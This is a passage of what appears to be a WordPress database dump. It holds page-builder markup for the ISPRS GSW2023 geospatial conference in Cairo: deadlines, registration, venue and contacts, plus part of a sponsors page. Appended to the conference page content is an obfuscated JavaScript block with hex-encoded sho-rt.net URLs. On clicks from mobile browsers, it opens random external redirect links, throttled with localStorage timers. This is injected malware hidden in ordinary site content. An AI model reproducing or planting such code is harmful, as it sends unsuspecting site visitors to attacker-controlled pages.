content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:42:06','2023-05-17 05:42:06','',3066,'https://gsw2023.com/?p=4532',0,'revision','',0),
(4533,1,'2023-05-17 05:45:01','2023-05-17 05:45:01','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" 